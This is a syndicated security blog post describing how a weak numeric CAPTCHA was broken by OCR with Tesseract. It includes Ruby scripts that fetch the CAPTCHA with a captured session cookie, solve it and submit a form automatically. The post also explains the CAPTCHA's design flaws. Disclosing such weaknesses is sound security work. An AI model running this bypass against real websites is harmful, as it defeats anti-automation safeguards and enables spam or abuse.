
Breaking A Weak CAPTCHA implementation
So lets get started. Here is one sample captcha obtained from the website.
My first thought was to try the free “OCR to text” conversion service provided by guys at Free-Ocr. I uploaded few captchas to the website and it could successfully solve almost all of them. One solved capcha is shown below.
Now I knew that the CAPTCHA can be solved, and needed a way to automate the process of solving the captcha. I turned to Tesseract to do that for me. Tesseact enjoys the reputation of being one of the most accurate open source OCR engines available.
Tesseact was downloaded and installed on a windows box. The page requiring captcha input was sourcing captcha’s from a php script on the web server. Lets say its path is http://www.test.com/get_captcha.php. The following script helped download a sample captcha, stored it on local file system and then solved it.
require ‘net/http’
tesseract = ‘C:\Tesseract-OCR\tesseract.exe’
q = Net::HTTP.new(‘www.test.com’,80)
# Download new captcha
r = q.get(“/get_captcha.php”)
File.open(“captcha.bmp”,’wb’) do |f|
f.puts r.body
end
# Solve the CAPTCHA
system(“#{tesseract} captcha.bmp captcha”) #Output gets stored in captcha.txt
- GET /home.php page and capture the value of PHPSESSIONID.
- Retrieve a captcha by accessing /get_captcha.php while using the captured PHPSESSIONID.
- Solve the captcha locally
- POST the form fields along with PHPSESSIONID and the captcha value
require ‘net/http’
tesseract = ‘C:\Tesseract-OCR\tesseract.exe’
q = Net::HTTP.new(‘www.test.com’,80)
r = q.get(“/home.php”)
r[‘set-cookie’] =~ /PHPSESSIONID=(.*?);/
hdr = {‘Cookie’ => “PHPSESSIONID=#{$1}”}
#get a captcha associated with a valid PHPSESSIONID and solve it
r = q.get(“/get_captcha.php”,hdr)
File.open(“captcha.bmp”,’wb’) do |f|
f.puts r.body
end
system(“#{tesseract} captcha.bmp captcha”)
#retrive the captcha value and POST the form details along with valid PHPSESSIONID
captcha = File.read(“captcha.txt”).strip
q.post(‘/save_details.php’, “fname=gursev&lname=kalra&captcha=#{captcha}” , hdr)
- Captchas contained only numerals and hence lesser number of possible combinations.
- Out of 100 captchas around 4 duplicate captchas were identified. Thats around 4% of total captchas issued.
- Captchas had uneven character distribution with 4’s and 5’s getting the maximum share of captcha characters. The distribution formed a bell curve with a peak at 4 and 5.
*** This is a Security Bloggers Network syndicated blog from Random Security authored by Gursev Singh Kalra. Read the original post at: http://gursevkalra.blogspot.com/2011/03/breaking-weak-captcha-implementation.html